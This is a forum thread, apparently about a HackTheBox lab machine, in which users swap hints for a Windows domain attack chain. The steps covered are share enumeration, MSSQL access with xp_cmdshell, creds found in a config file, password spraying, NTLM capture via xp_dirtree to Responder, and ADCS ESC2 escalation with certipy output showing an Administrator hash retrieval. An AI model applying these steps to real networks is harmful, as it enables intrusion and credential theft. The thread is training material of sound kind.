[bkbk]

- xlsx files
- get creds
- worksfor mssqlclient.py
- enable xp_cmdshell
- enumerate and find creds in config
- esc2 for privesc

Being trying that ESC2 privesc no luck. Any more deets ?

Youll have to make sure Ryan has the correct privs to over write the password. Look at Bloodhound it will show you the path when you click on the relationship between Ryan and the CA account.

[0xbeef]

- xlsx files
- get creds
- worksfor mssqlclient.py
- enable xp_cmdshell
- enumerate and find creds in config
- esc2 for privesc

Being trying that ESC2 privesc no luck. Any more deets ?

Youll have to make sure Ryan has the correct privs to over write the password. Look at Bloodhound it will show you the path when you click on the relationship between Ryan and the CA account.

got it thanks !

This forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching.

[akorshikai]

The xlsx files are corrupted on my side when I try to open them, is it the same for anyone else ?

You can use Jumpshare to open them online as well.

[nt0wl]

- xlsx files
- get creds
- worksfor mssqlclient.py
- enable xp_cmdshell
- enumerate and find creds in config
- esc2 for privesc

Being trying that ESC2 privesc no luck. Any more deets ?

Youll have to make sure Ryan has the correct privs to over write the password. Look at Bloodhound it will show you the path when you click on the relationship between Ryan and the CA account.

got it thanks !

im stuck on Ryan i have bloodhound up but cant seem to find a place to write

[who4mi]

how to find xlsx files ?

[nt0wl]

└─$ certipy-ad auth -pfx administrator_dc01.pfx -dc-ip ${ip}

Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Found multiple identifications in certificate
[*] Please select one:
[0] UPN: 'Administrator@sequel.htb'
[1] DNS Host Name: 'dc01.sequel.htb'
> 0
[*] Using principal: administrator@sequel.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:*********


i finally got it omg

---

thank you for everyone that contributed much is appreciated

[travellerswimmer]

how to find xlsx files ?

use smbclient to look at shares using the creds given.
(You can also use spider module of cme to get a list of files.)

---

- xlsx files
- get creds
- worksfor mssqlclient.py
- enable xp_cmdshell
- enumerate and find creds in config
- esc2 for privesc

im not trying to enumarting as sql_svc im really confused how can i fidn ryan credentiel

Ryan's creds are located inside the sql-Configuration.INI file. The password is the same as the sql_svc account.

Where can I find "sql-Configuration.INI file". Have creds for a user, other than rose, but cannot find ryan anywhere.

[greenfire]

how to find xlsx files ?

use smbclient to look at shares using the creds given.
(You can also use spider module of cme to get a list of files.)

---

- xlsx files
- get creds
- worksfor mssqlclient.py
- enable xp_cmdshell
- enumerate and find creds in config
- esc2 for privesc

im not trying to enumarting as sql_svc im really confused how can i fidn ryan credentiel

Ryan's creds are located inside the sql-Configuration.INI file. The password is the same as the sql_svc account.

Where can I find "sql-Configuration.INI file". Have creds for a user, other than rose, but cannot find ryan anywhere.

Rule of thumb is always to spray all the passwords found against list of users

[jabjab]

- xlsx files
- get creds
- worksfor mssqlclient.py
- enable xp_cmdshell
- enumerate and find creds in config
- esc2 for privesc

help, pls, im stucked at EXEC xp_dirtree "\\my-ip\share", have responder. NTLM requested to it. But john/hashcat with rockyou.txt have no crack

[jabjab]

how to find xlsx files ?

use smbclient to look at shares using the creds given.
(You can also use spider module of cme to get a list of files.)

---

- xlsx files
- get creds
- worksfor mssqlclient.py
- enable xp_cmdshell
- enumerate and find creds in config
- esc2 for privesc

im not trying to enumarting as sql_svc im really confused how can i fidn ryan credentiel

Ryan's creds are located inside the sql-Configuration.INI file. The password is the same as the sql_svc account.

Where can I find "sql-Configuration.INI file". Have creds for a user, other than rose, but cannot find ryan anywhere.

Rule of thumb is always to spray all the passwords found against list of users

yeap, enum works for it. got ryan